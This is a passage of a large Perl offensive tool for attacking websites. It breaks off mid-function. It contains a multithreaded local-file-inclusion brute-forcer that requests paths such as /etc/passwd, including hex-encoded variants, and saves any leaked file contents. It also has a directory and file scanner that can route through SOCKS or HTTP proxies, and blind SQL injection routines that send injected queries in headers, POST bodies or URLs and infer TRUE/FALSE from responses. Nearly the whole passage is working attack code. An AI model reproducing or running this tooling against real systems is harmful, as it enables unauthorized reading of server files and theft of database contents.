8300.         print "    [1] Start brute\n";
8301.         print "    [2] Main menu\n";
8302.         print "----------------------\n";
8303.         $choice = <STDIN>;
8304.         chomp $choice;
8305.         if ($choice == 1) {
8306.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
8307.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
8308.             print FILE1 "-------------------------------------------------------\n";
8309.             print FILE1 "LFI/Reader/Load_file() - unvisual error when wrong query\n";
8310.             print FILE1 "-------------------------------------------------------\n";
8311.             print "File: $lrl_list\n";
8312.             print "Records: $size\n\n";
8313.             print "----------------------\n";
8314.             print "ONLY GET METHOD FOR THIS MODE!!! NO PROXY!!!! Continue ? (1/0): \n";
8315.             $choice = <STDIN>;
8316.             chomp $choice;
8317.             if ($choice == 1) {
8318.                  print "----------------------\n";
8319.                  print "Get wrong URL, wait please...";
8320.                  $space = "";
8321.                  $wrong_test = "etc/passwd1";
8322.                  $urii = $lrl_start . $wrong_test . $lrl_end;
8323.                  $current = $urii;
8324.                  $content = get($urii);
8325.                  sleep 1;
8326.                  $content  =~ s/$wrong_test/$space/egimosx;
8327.                  $wrong_url_length = length($content);
8328.                  print "OK\n";
8329.                  print "----------------------\n";
8330.                  $thr = $kol_threads; # ???-?? ???????
8331.                  $num = -1; # ?? ????????
8332.                  for(0..$thr) {
8333.                      $trl[$_] = threads->create(\&gets11);
8334.                  }
8335.                  for(0..$thr) {
8336.                      $trl[$_]->join;
8337.                  }
8338.                  sub gets11 {
8339.                       $| = 1;
8340.                       while ($num<$size) {
8341.                             { lock($num);
8342.                             $num++; }
8343.                             $current1 = $lrl_error[$num];
8344.                             $uri = $lrl_start . $current1 . $lrl_end;
8345.                             $current = $uri;
8346.                             $content = get($uri);
8347.                             $content  =~ s/$current1/$space/egimosx;
8348.                             $content_length = length($content);
8349.                             $lrl_flag = 1;
8350.                             if($content_length == $wrong_url_length || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
8351.                                  $lrl_flag = 0;
8352.                             }
8353.                             if ($lrl_flag == 1) {
8354.                                  print "   ---> /" . $current1 . "\n";
8355.                                  print FILE1 "     "  . $current . "\n";
8356.                                  print FILE2 "\n\n\n====================================\n";
8357.                                  print FILE2 "     /"  . $current1 . "\n";
8358.                                  print FILE2 "====================================\n";
8359.                                  print FILE2 $content . "\n";
8360.                             }
8361.                             print $num . "\r";
8362.                             sleep $pause;
8363.                       }
8364.                  }
8365.                  print "-------------------------------------------------------------------------------\n";
8366.                  print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
8367.                  close(FILE1);
8368.                  close(FILE2);
8369.                  goto START3;
8370.             }
8371.             if ($choice == 0) {
8372.                  close(FILE1);
8373.                  close(FILE2);
8374.                  goto START3;
8375.             }
8376.         }
8377.     }
8378.     if ($choice == 6){
8379.         print "scan URL: $lrl_url\n";
8380.         print "----------------------\n";
8381.         print "    [1] Start brute\n";
8382.         print "    [2] Main menu\n";
8383.         print "----------------------\n";
8384.         $choice = <STDIN>;
8385.         chomp $choice;
8386.         if ($choice == 1) {
8387.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
8388.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
8389.             print FILE1 "-------------------------------------------------------\n";
8390.             print FILE1 "LFI/Reader/Load_file() - unvisual error when wrong query\n";
8391.             print FILE1 "-------------------------------------------------------\n";
8392.             print "File: $lrl_list\n";
8393.             print "Records: $size\n\n";
8394.             print "----------------------\n";
8395.             print "ONLY GET METHOD FOR THIS MODE!!! NO PROXY!!!! Continue ? (1/0): \n";
8396.             $choice = <STDIN>;
8397.             chomp $choice;
8398.             if ($choice == 1) {
8399.                  print "----------------------\n";
8400.                  print "Get wrong URL, wait please...";
8401.                  $space = "";
8402.                  $wrong_test1 = "/etc/passwd1";
8403.                  $wrong_test = ascii_to_hex $wrong_test1;
8404.                  $urii = $lrl_start . $wrong_test . $lrl_end;
8405.                  $current = $urii;
8406.                  $content = get($urii);
8407.                  sleep 1;
8408.                  $content  =~ s/$wrong_test/$space/egimosx;
8409.                  $wrong_url_length = length($content);
8410.                  print "OK\n";
8411.                  print "----------------------\n";
8412.                  $thr = $kol_threads; # ???-?? ???????
8413.                  $num = -1; # ?? ????????
8414.                  for(0..$thr) {
8415.                     $trl[$_] = threads->create(\&gets12);
8416.                  }
8417.                  for(0..$thr) {
8418.                     $trl[$_]->join;
8419.                  }
8420.                  sub gets12 {
8421.                      $| = 1;
8422.                      while ($num<$size) {
8423.                            { lock($num);
8424.                            $num++; }
8425.                            $current2 = "/" . $lrl_error[$num];
8426.                            $current1 = ascii_to_hex $current2;
8427.                            $uri = $lrl_start . $current1 . $lrl_end;
8428.                            $current = $uri;
8429.                            $content = get($uri);
8430.                            $content  =~ s/$current1/$space/egimosx;
8431.                            $content_length = length($content);
8432.                            $lrl_flag = 1;
8433.                            if($content_length == $wrong_url_length || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
8434.                                $lrl_flag = 0;
8435.                            }
8436.                            if ($lrl_flag == 1) {
8437.                                print "   ---> " . $current2 . "\n";
8438.                                print FILE1 "------------------------------------\n";
8439.                                print FILE1 "  $current2\n";
8440.                                print FILE1 "------------------------------------\n";
8441.                                print FILE1 "     "  . $current . "\n";
8442.                                print FILE2 "\n\n\n====================================\n";
8443.                                print FILE2 "     /"  . $current2 . "\n";
8444.                                print FILE2 "====================================\n";
8445.                                print FILE2 $content . "\n";
8446.                            }
8447.                            print $num . "\r";
8448.                            sleep $pause;
8449.                      }
8450.                  }
8451.                  print "-------------------------------------------------------------------------------\n";
8452.                  print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
8453.                  close(FILE1);
8454.                  close(FILE2);
8455.                  goto START3;
8456.             }
8457.             if ($choice == 0) {
8458.                  close(FILE1);
8459.                  close(FILE2);
8460.                  goto START3;
8461.             }
8462.         }
8463.     }
8464.     if ($choice == 5){
8465.         print "scan URL: $lrl_url\n";
8466.         print "----------------------\n";
8467.         print "    [1] Start brute\n";
8468.         print "    [2] Main menu\n";
8469.         print "----------------------\n";
8470.         $choice1 = <STDIN>;
8471.         chomp $choice1;
8472.         if ($choice1 == 1) {
8473.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
8474.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
8475.             print FILE1 "-------------------------------------------------------\n";
8476.             print FILE1 "LFI/Reader/Load_file() - visual error when wrong query\n";
8477.             print FILE1 "-------------------------------------------------------\n";
8478.             print "File: $lrl_list\n";
8479.             print "Records: $size\n\n";
8480.             print "----------------------\n";
8481.             print "Request method - $method\n";
8482.             print "Threads - $kol_threads\n";
8483.             print "Proxy - $proxy_message\n";
8484.             print "----------------------\n";
8485.             $thr = $kol_threads; # ???-?? ???????
8486.             $num = -1; # ?? ????????
8487.             for(0..$thr) {
8488.                 $trl[$_] = threads->create(\&gets13);
8489.             }
8490.             for(0..$thr) {
8491.                 $trl[$_]->join;
8492.             }
8493.             sub gets13 {
8494.                $| = 1;
8495.                while ($num<$size) {
8496.                   { lock($num);
8497.                   $num++; }
8498.                   $current2 = "/" . $lrl_error[$num];
8499.                   $current1 = ascii_to_hex $current2;
8500.                   $uri = $lrl_start . $current1 . $lrl_end;
8501.                   $current = $uri;
8502.                   $current_log = $lrl_start . $current2 . $lrl_end;
8503.                   $host = $host2;
8504.                   $content = scan_url();
8505.                   $lrl_flag = 1;
8506.                   if($content =~ m/$lrl_error_message/img || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
8507.                       $lrl_flag = 0;
8508.                   }
8509.                   if ($lrl_flag == 1) {
8510.                        print "   ---> " . $current2 . "\n";
8511.                        print FILE1 "------------------------------------\n";
8512.                        print FILE1 "  $current2\n";
8513.                        print FILE1 "------------------------------------\n";
8514.                        print FILE1 "     "  . $current . "\n";
8515.                        print FILE2 "\n\n\n====================================\n";
8516.                        print FILE2 "     /"  . $current2 . "\n";
8517.                        print FILE2 "====================================\n";
8518.                        print FILE2 $content . "\n";
8519.                   }
8520.                   print $num . "\r";
8521.                   sleep $pause;
8522.                }
8523.             }
8524.             print "-------------------------------------------------------------------------------\n";
8525.             print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
8526.             close(FILE1);
8527.             close(FILE2);
8528.             goto START3;
8529.         }
8530.     }
8531.     if ($choice == 7) {goto START_global}
8532. }
8533. ## End LFI bruter
8534. ##############################################################################################################
8535. ## Scan site for folders & files mode ##
8536. if ($choice == 9) {
8537.     START2:
8538. if ($scan_url =~ m/^https:\/\/?([^\/]+)/i) {
8539.    $host1 = $1;
8540.    $https_flag = 1;
8541.    print "----------------------\n";
8542.    print "HTTPS mode enabled\n";
8543.    print "----------------------\n";
8544. }
8545.     $host = $host1;
8546. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
8547.     print "-----------------------------------------\n";
8548.     print "Authorization required, wait please....";
8549.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
8550.     $ck1 = collect($answ1);
8551.     $https_auth_check = 1;
8552.     print " DONE\n";
8553.     print "-----------------------------------------\n";
8554. }
8555.     if ($use_socks == 1 && $socks_check == 0) {
8556.   $check_url = $host;
8557.   our $query = "GET / HTTP/1.$http_protocol\r\n"
8558.            . "Host: $check_host\r\n"
8559.            . "Referer: http://" . $check_url . "\r\n"
8560.            . "Accept: */*\r\n"
8561.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
8562.            . "Connection: close\r\n\r\n";
8563.    print "----------------------------------------\n";
8564.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
8565.    print "Timeout = 5 sec:\n";
8566.    print "----------------------------------------\n";
8567.    $socks_check = 0;
8568.    $check_socks = socks_check();
8569.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
8570.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
8571.   if ($current_proxy_host) {
8572.      $socks_check = 1;
8573.      print "Will use --> $proxy_message\n";
8574.   } else {
8575.      $socks_check = 0;
8576.      $proxy_message = "No";
8577.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
8578.   }
8579. }
8580.     print "----------------------------------\n";
8581.     print "Scan site for folders & files mode\n";
8582.  
8583.     print "----------------------------------\n";
8584.     print "    [1] Start scan\n";
8585.     print "    [2] Main menu\n";
8586.     print "----------------------------------\n";
8587.     $choice = <STDIN>;
8588.     chomp $choice;
8589.     if ($choice == 1) {
8590.         open( FILE1, ">>" . "z_" .$host1 . ".txt" ); # ???? ??? ?????? ???????????
8591.         print FILE1 "----------------------------------\n";
8592.         print FILE1 "Scan site for folders & files mode\n";
8593.         print FILE1 "----------------------------------\n";
8594.         print "Scan URL: $scan_url\n";
8595.         open(FILE, "<", $error_list);
8596.         while(<FILE>) {
8597.             chomp;
8598.             push(@error, $_);
8599.         }
8600.         close(FILE);
8601.         $size = 0;
8602.         $size = @error;
8603.         open(FILE2, "<", $folder_list);
8604.         while(<FILE2>) {
8605.             chomp;
8606.             push(@folder, $_);
8607.         }
8608.         close(FILE2);
8609.         $size1 = 0;
8610.         $size1 = @folder;
8611.         print "---------------------------------\n";
8612.         print "File with errors: $error_list\n";
8613.         print "File with folders: $folder_list\n";
8614.         print "Folders: $size1\n";
8615.         print "---------------------------------\n";
8616.         print "Request method - $method\n";
8617.         print "Threads - $kol_threads\n";
8618.         print "Proxy - $proxy_message\n";
8619.         print "----------------------\n";
8620.         $thr = $kol_threads; # ???-?? ???????
8621.        $num = -1; # ?? ????????
8622.        for(0..$thr) {
8623.             $trl[$_] = threads->create(\&gets8);
8624.        }
8625.        for(0..$thr) {
8626.             $trl[$_]->join;
8627.        }
8628.        sub gets8 {
8629.             $| = 1;
8630.             while ($num<$size1) {
8631.                 { lock($num);
8632.                $num++; }
8633.                $current1 = $folder[$num];
8634.                $uri = $scan_url . "/" . $current1;
8635.                $current = $uri;
8636.                $host = $host1;
8637.                $content = scan_url();
8638.                $i = 0;
8639.                $flag = 1;
8640.                while ($i<$size) {
8641.                    if($content =~ m/$error[$i]/img) {$flag = 0}
8642.                    $i++;
8643.                }
8644.                if ($flag == 1) {
8645.                        print "   ---> " . $uri . "\n";
8646.                        print FILE1 "     - "  . $uri . "\n";
8647.                }
8648.                print $num . "\r";
8649.                sleep $pause;
8650.             }
8651.        }
8652.        print "----------\n";
8653.        print "Saved in " . "z_" . $host1 . ".txt\n";
8654.        close(FILE1);
8655.        goto START2;
8656.  
8657.     }
8658.     if ($choice == 2) {
8659.        goto START_global;
8660.     }
8661. }
8662. ######################################################################################################################
8663. sub wr_check_HEADER {
8664.   $result = 0;
8665.   $host = $host3;
8666.   $current = $bl_url;
8667.   $bl_query =~ s!\Q$search!$replacement!g;
8668.   $res = "";
8669. if($current && $bl_query){
8670. if ($test_mode==1) {
8671.     print "===============================================\n";
8672.     print "URL: $current\n";
8673.     print "HEADER query: $bl_query\n";
8674. }
8675. if ($https_flag == 0) {
8676.   if ($socks_check == 0) {
8677.        if ($use_proxy == 0) {
8678.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
8679.                 print $socket "$method $current HTTP/1.$http_protocol\n";
8680.                 print $socket "Host: $host\n";
8681.                 if ($cookie) {
8682.                     print $socket "Cookie: $cookie\n";
8683.                 }
8684.                 print $socket "Accept: */*\n";
8685.                 if ($referer) {
8686.                     print $socket "Http-Referer: $referer\n";
8687.                 }
8688.                 if ($user_agent) {
8689.                     print $socket "User-Agent: $user_agent\n";
8690.                 }
8691.                 if ($sql_header) {
8692.                     print $socket "$bl_query\n";
8693.                 }
8694.                 print $socket "Pragma: no-cache\n";
8695.                 print $socket "Cache-Control: no-cache\n";
8696.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
8697.                 print $socket "Connection: close\n\n";
8698.                 $socket->autoflush(1);
8699.                 while (<$socket>) {
8700.                    $res .= $_ while <$socket>;
8701.                    if ($bl_error_type == 1) {
8702.                        if($res =~ m/$bl_error/img) {
8703.                           close $socket;
8704.                           $result = 1;
8705.                           blind_t();
8706.                           return $result;
8707.                        } else {
8708.                           close $socket;
8709.                           blind_f();
8710.                           return $result;
8711.                        }
8712.                    }
8713.                    if ($bl_error_type == 0) {
8714.                        if($res =~ m/$bl_error/img) {
8715.                           blind_f();
8716.                            return $result;
8717.                        } else {
8718.                            $result = 1;
8719.                           blind_t();
8720.                            return $result;
8721.                        }
8722.                    }
8723.                 }
8724.                 close $socket;
8725.             }
8726.        } else {
8727.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
8728.                 print $socket "$method $current HTTP/1.$http_protocol\n";
8729.                 print $socket "Host: $host\n";
8730.                 if ($cookie) {
8731.                     print $socket "Cookie: $cookie\n";
8732.                 }
8733.                 print $socket "Accept: */*\n";
8734.                 if ($referer) {
8735.                     print $socket "Http-Referer: $referer\n";
8736.                 }
8737.                 if ($user_agent) {
8738.                     print $socket "User-Agent: $user_agent\n";
8739.                 }
8740.                 if ($sql_header) {
8741.                     print $socket "$bl_query\n";
8742.                 }
8743.                 print $socket "Pragma: no-cache\n";
8744.                 print $socket "Cache-Control: no-cache\n";
8745.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
8746.                 print $socket "Connection: close\n\n";
8747.                 $socket->autoflush(1);
8748.                 while (<$socket>) {
8749.                    $res  .= $_ while <$socket>;
8750.                    if ($bl_error_type == 1) {
8751.                        if($res =~ m/$bl_error/img) {
8752.                           close $socket;
8753.                           blind_t();
8754.                           $result = 1;
8755.                           return $result;
8756.                        } else {
8757.                           close $socket;
8758.                           blind_f();
8759.                           return $result;
8760.                        }
8761.                    }
8762.                    if ($bl_error_type == 0) {
8763.                        if($res =~ m/$bl_error/img) {
8764.                            close $socket;
8765.                           blind_f();
8766.                            return $result;
8767.                        } else {
8768.                            close $socket;
8769.                           blind_t();
8770.                            $result = 1;
8771.                            return $result;
8772.                        }
8773.                    }
8774.                 }
8775.                 close $socket;
8776.             }
8777.       }
8778.    } else {
8779.       $check_url = $current;
8780.       $check_host = $host;
8781.     if ($cookie) {
8782.      if ($sql_header) {
8783.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8784.            . "Host: $check_host\r\n"
8785.            . "Cookie: $cookie\r\n"
8786.            . "Referer: " . $referer . "\r\n"
8787.            . "Accept: */*\r\n"
8788.            . "User-Agent: $user_agent\r\n"
8789.            . "Content-Type: application/x-www-form-urlencoded\n"
8790.            . "$bl_query\r\n"  
8791.            . "Connection: close\r\n\r\n";
8792.         } else {
8793.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8794.            . "Host: $check_host\r\n"
8795.            . "Cookie: $cookie\r\n"
8796.            . "Referer: " . $referer . "\r\n"
8797.            . "Accept: */*\r\n"
8798.            . "User-Agent: $user_agent\r\n"
8799.            . "Connection: close\r\n\r\n";
8800.  
8801.         }
8802.     } else {
8803.       if ($sql_header) {
8804.           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8805.            . "Host: $check_host\r\n"
8806.            . "Referer: " . $referer . "\r\n"
8807.            . "Accept: */*\r\n"
8808.            . "User-Agent: $user_agent\r\n"
8809.            . "Content-Type: application/x-www-form-urlencoded\n"
8810.            . "$bl_query\r\n"  
8811.            . "Connection: close\r\n\r\n";
8812.         } else {
8813.            our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8814.            . "Host: $check_host\r\n"
8815.            . "Referer: " . $referer . "\r\n"
8816.            . "Accept: */*\r\n"
8817.            . "User-Agent: $user_agent\r\n"
8818.            . "Connection: close\r\n\r\n";
8819.  
8820.         }
8821.     }
8822.      $res = socks_get();
8823.      if ($bl_error_type == 1) {
8824.          if($res =~ m/$bl_error/img) {
8825.                           blind_t();
8826.               $result = 1;
8827.               return $result;
8828.          } else {
8829.                           blind_f();
8830.               return $result;
8831.          }
8832.      }
8833.      if ($bl_error_type == 0) {
8834.          if($res =~ m/$bl_error/img) {
8835.                           blind_f();
8836.               return $result;
8837.          } else {
8838.                           blind_t();
8839.               $result = 1;
8840.               return $result;
8841.          }
8842.      }
8843.   }
8844. } else {
8845.    $res = req($host, $current, 'GET', 0, $ck1);
8846.    if ($bl_error_type == 1) {
8847.         if($res =~ m/$bl_error/img) {
8848.                           blind_t();
8849.              $result = 1;
8850.              return $result;
8851.          } else {
8852.                           blind_f();
8853.              return $result;
8854.          }
8855.    }
8856.    if ($bl_error_type == 0) {
8857.         if($res =~ m/$bl_error/img) {
8858.                           blind_f();
8859.              return $result;
8860.         } else {
8861.              $result = 1;
8862.                           blind_t();
8863.              return $result;
8864.         }
8865.    }
8866. }
8867. }
8868. }
8869.  
8870. sub wr_check_POST {
8871.   $result = 0;
8872.   $host = $host3;
8873.   $current = $bl_url;
8874.   $res = "";
8875. if($current && $bl_query){
8876. if ($test_mode==1) {
8877.     print "===============================================\n";
8878.     print "URL: $current\n";
8879.     print "POST query: $bl_query\n";
8880. }
8881. $lsd=length $bl_query;
8882. if ($https_flag == 0) {
8883.   if ($socks_check == 0) {
8884.        if ($use_proxy == 0) {
8885.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
8886.                 print $socket "$method $current HTTP/1.$http_protocol\n";
8887.                 print $socket "Host: $host\n";
8888.                 if ($cookie) {
8889.                     print $socket "Cookie: $cookie\n";
8890.                 }
8891.                 print $socket "Accept: */*\n";
8892.                 if ($referer) {
8893.                     print $socket "Http-Referer: $referer\n";
8894.                 }
8895.                 if ($user_agent) {
8896.                     print $socket "User-Agent: $user_agent\n";
8897.                 }
8898.                 print $socket "Pragma: no-cache\n";
8899.                 print $socket "Cache-Control: no-cache\n";
8900.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
8901.                 print $socket "Content-Length: $lsd\n";
8902.                 print $socket "Connection: close\n\n";
8903.                 print $socket $bl_query ."\n";
8904.                 $socket->autoflush(1);
8905.                 while (<$socket>) {
8906.                    $res .= $_ while <$socket>;
8907.                    if ($bl_error_type == 1) {
8908.                        if($res =~ m/$bl_error/img) {
8909.                           close $socket;
8910.                           blind_t();
8911.                           $result = 1;
8912.                           return $result;
8913.                        } else {
8914.                           close $socket;
8915.                           blind_f();
8916.                           return $result;
8917.                        }
8918.                    }
8919.                    if ($bl_error_type == 0) {
8920.                        if($res =~ m/$bl_error/img) {
8921.                           blind_f();
8922.                            return $result;
8923.                        } else {
8924.                           blind_t();
8925.                            $result = 1;
8926.                            return $result;
8927.                        }
8928.                    }
8929.                 }
8930.                 close $socket;
8931.             }
8932.        } else {
8933.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
8934.                 print $socket "$method $current HTTP/1.$http_protocol\n";
8935.                 print $socket "Host: $host\n";
8936.                 if ($cookie) {
8937.                     print $socket "Cookie: $cookie\n";
8938.                 }
8939.                 print $socket "Accept: */*\n";
8940.                 if ($referer) {
8941.                     print $socket "Http-Referer: $referer\n";
8942.                 }
8943.                 if ($user_agent) {
8944.                     print $socket "User-Agent: $user_agent\n";
8945.                 }
8946.                 print $socket "Pragma: no-cache\n";
8947.                 print $socket "Cache-Control: no-cache\n";
8948.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
8949.                 print $socket "Content-Length: $lsd\n";
8950.                 print $socket "Connection: close\n\n";
8951.                 print $socket $bl_query ."\n";
8952.                 $socket->autoflush(1);
8953.                 while (<$socket>) {
8954.                    $res  .= $_ while <$socket>;
8955.                    if ($bl_error_type == 1) {
8956.                        if($res =~ m/$bl_error/img) {
8957.                           close $socket;
8958.                           blind_t();
8959.                           $result = 1;
8960.                           return $result;
8961.                        } else {
8962.                           close $socket;
8963.                           blind_f();
8964.                           return $result;
8965.                        }
8966.                    }
8967.                    if ($bl_error_type == 0) {
8968.                        if($res =~ m/$bl_error/img) {
8969.                            close $socket;
8970.                           blind_f();
8971.                            return $result;
8972.                        } else {
8973.                            close $socket;
8974.                           blind_t();
8975.                            $result = 1;
8976.                            return $result;
8977.                        }
8978.                    }
8979.                 }
8980.                 close $socket;
8981.             }
8982.       }
8983.    } else {
8984.       $check_url = $current;
8985.       $check_host = $host;
8986.     if ($cookie) {
8987.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8988.            . "Host: $check_host\r\n"
8989.            . "Cookie: $cookie\r\n"
8990.            . "Referer: " . $referer . "\r\n"
8991.            . "Accept: */*\r\n"
8992.            . "User-Agent: $user_agent\r\n"
8993.            . "Content-Type: application/x-www-form-urlencoded\n"
8994.            . "Content-Length: $lsd\n"
8995.            . "Connection: close\n\n"
8996.            .  $bl_query ."\n";
8997.     } else {
8998.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
8999.            . "Host: $check_host\r\n"
9000.  
9001.            . "Referer: " . $referer . "\r\n"
9002.            . "Accept: */*\r\n"
9003.            . "User-Agent: $user_agent\r\n"
9004.            . "Content-Type: application/x-www-form-urlencoded\n"
9005.            . "Content-Length: $lsd\n"
9006.            . "Connection: close\n\n"
9007.            .  $bl_query ."\n";
9008.     }
9009.      $res = socks_get();
9010.      if ($bl_error_type == 1) {
9011.          if($res =~ m/$bl_error/img) {
9012.                           blind_t();
9013.               $result = 1;
9014.               return $result;
9015.          } else {
9016.                           blind_f();
9017.               return $result;
9018.          }
9019.      }
9020.      if ($bl_error_type == 0) {
9021.          if($res =~ m/$bl_error/img) {
9022.                           blind_f();
9023.               return $result;
9024.          } else {
9025.                           blind_t();
9026.               $result = 1;
9027.               return $result;
9028.          }
9029.      }
9030.   }
9031. } else {
9032.    $res = req($host, $current, 'GET', 0, $ck1);
9033.    if ($bl_error_type == 1) {
9034.         if($res =~ m/$bl_error/img) {
9035.                           blind_t();
9036.              $result = 1;
9037.              return $result;
9038.          } else {
9039.                           blind_f();
9040.              return $result;
9041.          }
9042.    }
9043.    if ($bl_error_type == 0) {
9044.         if($res =~ m/$bl_error/img) {
9045.                           blind_f();
9046.              return $result;
9047.         } else {
9048.                           blind_t();
9049.              $result = 1;
9050.              return $result;
9051.         }
9052.    }
9053. }
9054. }
9055. }
9056. sub blind_t{
9057.      if ($test_mode==1) {
9058.        print "result: TRUE\n";
9059.        print "===============================================\n";
9060.      }
9061. }
9062. sub blind_f{
9063.      if ($test_mode==1) {
9064.        print "result: FALSE\n";
9065.        print "===============================================\n";
9066.      }
9067. }
9068. sub wr_check {
9069.   $result = 0;
9070.   $host = $host3;
9071.   $current = $bl_query;
9072.   $res = "";
9073. if ($current && $host){
9074. if ($test_mode==1) {
9075.     print "===============================================\n";
9076.     print "URL: $current\n";
9077. }
9078. if ($https_flag == 0) {
9079.   if ($socks_check == 0) {
9080.        if ($use_proxy == 0) {
9081.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
9082.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9083.                 print $socket "Host: $host\n";
9084.                 if ($cookie) {
9085.                     print $socket "Cookie: $cookie\n";
9086.                 }
9087.                 print $socket "Accept: */*\n";
9088.                 if ($referer) {
9089.                     print $socket "Http-Referer: $referer\n";
9090.                 }
9091.                 if ($user_agent) {
9092.                     print $socket "User-Agent: $user_agent\n";
9093.                 }
9094.                 print $socket "Pragma: no-cache\n";
9095.                 print $socket "Cache-Control: no-cache\n";
9096.                 print $socket "Connection: close\n\n";
9097.                 $socket->autoflush(1);
9098.                 while (<$socket>) {
9099.                    $res .= $_ while <$socket>;
9100.                    if ($bl_error_type == 1) {
9101.                        if($res =~ m/$bl_error/img) {
9102.                           close $socket;
9103.                           $result = 1;
9104.                           blind_t();
9105.                           return $result;
9106.                        } else {
9107.                           close $socket;
9108.                           blind_f();
9109.                           return $result;
9110.                        }
9111.                    }
9112.                    if ($bl_error_type == 0) {
9113.                        if($res =~ m/$bl_error/img) {
9114.                            blind_f();
9115.                            return $result;
9116.                        } else {
9117.                           $result = 1;
9118.                           blind_t();
9119.                           return $result;
9120.                        }
9121.                    }
9122.                 }
9123.                 close $socket;
9124.             }
9125.        } else {
9126.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
9127.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9128.                 print $socket "Host: $host\n";
9129.                 if ($cookie) {
9130.                     print $socket "Cookie: $cookie\n";
9131.                 }
9132.                 print $socket "Accept: */*\n";
9133.                 if ($referer) {
9134.                     print $socket "Http-Referer: $referer\n";
9135.                 }
9136.                 if ($user_agent) {
9137.                     print $socket "User-Agent: $user_agent\n";
9138.                 }
9139.                 print $socket "Pragma: no-cache\n";
9140.                 print $socket "Cache-Control: no-cache\n";
9141.                 print $socket "Connection: close\n\n";
9142.                 $socket->autoflush(1);
9143.                 while (<$socket>) {
9144.                    $res  .= $_ while <$socket>;
9145.                    if ($bl_error_type == 1) {
9146.                        if($res =~ m/$bl_error/img) {
9147.                           close $socket;
9148.                           $result = 1;
9149.                           blind_t();
9150.                           return $result;
9151.                        } else {
9152.                           close $socket;
9153.                           blind_f();
9154.                           return $result;
9155.                        }
9156.                    }
9157.                    if ($bl_error_type == 0) {
9158.                        if($res =~ m/$bl_error/img) {
9159.                            close $socket;
9160.                           blind_f();
9161.                            return $result;
9162.                        } else {
9163.                            close $socket;
9164.                            $result = 1;
9165.                           blind_t();
9166.                            return $result;
9167.                        }
9168.                    }
9169.                 }
9170.                 close $socket;
9171.             }
9172.       }
9173.    } else {
9174.       $check_url = $current;
9175.       $check_host = $host;
9176.     if ($cookie) {
9177.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9178.            . "Host: $check_host\r\n"
9179.            . "Cookie: $cookie\r\n"
9180.            . "Referer: " . $referer . "\r\n"
9181.            . "Accept: */*\r\n"
9182.            . "User-Agent: $user_agent\r\n"
9183.            . "Connection: close\r\n\r\n";
9184.     } else {
9185.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9186.            . "Host: $check_host\r\n"
9187.            . "Referer: " . $referer . "\r\n"
9188.            . "Accept: */*\r\n"
9189.            . "User-Agent: $user_agent\r\n"
9190.            . "Connection: close\r\n\r\n";
9191.     }
9192.      $res = socks_get();
9193.      if ($bl_error_type == 1) {
9194.          if($res =~ m/$bl_error/img) {
9195.               $result = 1;
9196.               blind_t();
9197.               return $result;
9198.          } else {
9199.               blind_f();
9200.               return $result;
9201.          }
9202.      }
9203.      if ($bl_error_type == 0) {
9204.          if($res =~ m/$bl_error/img) {
9205.               blind_f();
9206.               return $result;
9207.          } else {
9208.               $result = 1;
9209.               blind_t();
9210.               return $result;
9211.          }
9212.      }
9213.   }
9214. } else {
9215.    $res = req($host, $current, 'GET', 0, $ck1);
9216.    if ($bl_error_type == 1) {
9217.         if($res =~ m/$bl_error/img) {
9218.              $result = 1;
9219.              blind_t();
9220.              return $result;
9221.          } else {
9222.              blind_f();
9223.              return $result;
9224.          }
9225.    }
9226.    if ($bl_error_type == 0) {
9227.         if($res =~ m/$bl_error/img) {
9228.              blind_f();
9229.              return $result;
9230.         } else {
